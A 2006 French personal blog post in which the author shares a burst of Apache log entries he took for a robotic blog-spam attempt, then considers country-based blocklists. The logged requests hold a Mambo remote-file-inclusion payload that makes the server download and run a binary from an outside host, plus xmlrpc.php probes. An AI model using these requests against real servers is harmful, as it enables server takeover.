Tentative de spam de blog
Par Petaramesh le jeudi 16 février 2006, 09:48 - Miscellania - Lien permanent
Attrapée à la volée dans mes logs Apache cette giclée de requêtes qui ressemble à s'y méprendre à une tentative robotisée de spam de blog...
200.14.234.121 - - 16/Feb/2006:09:34:13 +0100 "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:13 +0100 "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:14 +0100 "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:14 +0100 "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:15 +0100 "GET /mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:15 +0100 "GET /mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:17 +0100 "GET /cvs/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:17 +0100 "GET /cvs/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:18 +0100 "GET /articles/mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:18 +0100 "GET /articles/mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:19 +0100 "GET /cvs/mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:19 +0100 "GET /cvs/mambo/index2.php?_REQUESToption=com_content&_REQUESTItemid=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod%20744%20giculo;./giculo;echo%20YYY;echo| HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:20 +0100 "POST /xmlrpc.php HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:20 +0100 "POST /xmlrpc.php HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:22 +0100 "POST /blog/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:22 +0100 "POST /blog/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:23 +0100 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:23 +0100 "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:24 +0100 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:24 +0100 "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:25 +0100 "POST /drupal/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:25 +0100 "POST /drupal/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:27 +0100 "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:27 +0100 "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:28 +0100 "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:28 +0100 "POST /wordpress/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:29 +0100 "POST /xmlrpc.php HTTP/1.1" 404 653 200.14.234.121 - - 16/Feb/2006:09:34:29 +0100 "POST /xmlrpc.php HTTP/1.1" 404 653 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:30 +0100 "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:30 +0100 "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 200.14.234.121 - - 16/Feb/2006:09:34:32 +0100 "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - 200.14.234.121 - - 16/Feb/2006:09:34:32 +0100 "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
...D'autant plus que la chose nous vient de Colombie, et que je ne crois pas encore avoir d'admirateurs là-bas.
Je me dis comme ça qu'il ne serait pas une mauvaise idée d'ajouter à mon Spamplemousse quelques zones extraites de Blackholes.us pour les pays exotiques d'où il est très peu probable que ce modeste blog reçoive des commentaires légitimes, mais qui sont connus pour être de véritables spammotrons...









